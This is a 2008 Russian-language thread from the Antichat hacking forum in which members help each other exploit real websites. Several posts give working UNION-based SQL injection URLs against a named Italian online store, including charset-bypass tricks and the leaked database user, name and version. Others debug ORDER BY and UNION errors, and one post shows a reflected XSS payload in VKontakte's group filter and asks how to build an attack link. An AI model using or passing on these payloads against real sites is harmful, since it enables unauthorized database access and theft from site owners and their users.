HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3891  
Старый 28.11.2008, 01:09
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Понятно. еще вопрос.
__http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8.9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36/*

почему, когда хочу узнать версию базы данных, выскакиет ошибка?
___http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,database(),4,5,6,7,8.9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36/*
 
Ответить с цитированием

  #3892  
Старый 28.11.2008, 01:20
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

проблемы с кодировкой используй конструкцию aes_decrypt(aes_encrypt())

/add jokester опередил с примером '(

Последний раз редактировалось l1ght; 28.11.2008 в 01:31..
 
Ответить с цитированием

  #3893  
Старый 28.11.2008, 01:24
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Неа. Это не помогает. почему-то.
 
Ответить с цитированием

  #3894  
Старый 28.11.2008, 01:27
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Ershik  
Неа. Это не помогает. почему-то.
отлично помогает
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,UNHEX(HEX(concat_ws(0x3a,User() ,Database(),Version()))),4,5,6,7,8.9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36/*

administrator@localhost:gestione:4.1.11-Debian_4sarge7-log

И это тоже разумеется :
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,User(),Database(),Version()),1),1),4,5,6,7 ,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36/*

Последний раз редактировалось jokester; 28.11.2008 в 01:30..
 
Ответить с цитированием

  #3895  
Старый 28.11.2008, 01:34
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Я осознал.
Спасибо
 
Ответить с цитированием

  #3896  
Старый 28.11.2008, 15:21
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами: 9351767

Репутация: 2
По умолчанию

При исполнении следующих запросов :

page.php?id=-1'+order+by+3/* :

Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)

page.php?id=-1'+order+by+2/*

Выдает :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Что это означает? И как это победить?
 
Ответить с цитированием

  #3897  
Старый 28.11.2008, 15:28
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
С нами: 9232225

Репутация: 62
По умолчанию

Цитата:
Сообщение от SHS  
При исполнении следующих запросов :

page.php?id=-1'+order+by+3/* :

Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)

page.php?id=-1'+order+by+2/*

Выдает :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Что это означает? И как это победить?
так мож тут 2 колонки.
попробуй терь page.php?id=-1'+union+select+1,2/*
 
Ответить с цитированием

  #3898  
Старый 28.11.2008, 15:58
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами: 9351767

Репутация: 2
По умолчанию

Там и есть 2 колноки, но при запросе page.php?id=-1'+union+select+1,2/* :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
 
Ответить с цитированием

  #3899  
Старый 28.11.2008, 16:26
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

нужно указать группировку по полю (у вас конец запроса обрывается комментариями), т.е.
ляляля + group by поле/*

Последний раз редактировалось l1ght; 28.11.2008 в 16:29..
 
Ответить с цитированием

  #3900  
Старый 28.11.2008, 17:31
winter_silence
Новичок
Регистрация: 22.11.2008
Сообщений: 5
С нами: 9193081

Репутация: 0
По умолчанию

Я не уверен в том что это серьезный баг, вконтакте если зайти в свой аккаунт, раздел "мои группы" - справа вверху форма "фильтр групп".
В этой форме выполняется
Цитата:
"><script>alert('test')</script>
Код формы

Цитата:
<div class="groupsLookupCont"><input placeholder="Фильтр групп" id="g_filter" class="inputText" onkeyup="if (window.rs) {rs.lookup(this, event);}" type="text"></div>
<script type="text/javascript">
placeholderSetup('g_filter');
</script>
Собственно вопрос такой: можно ли сформировать ссылку XSS?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.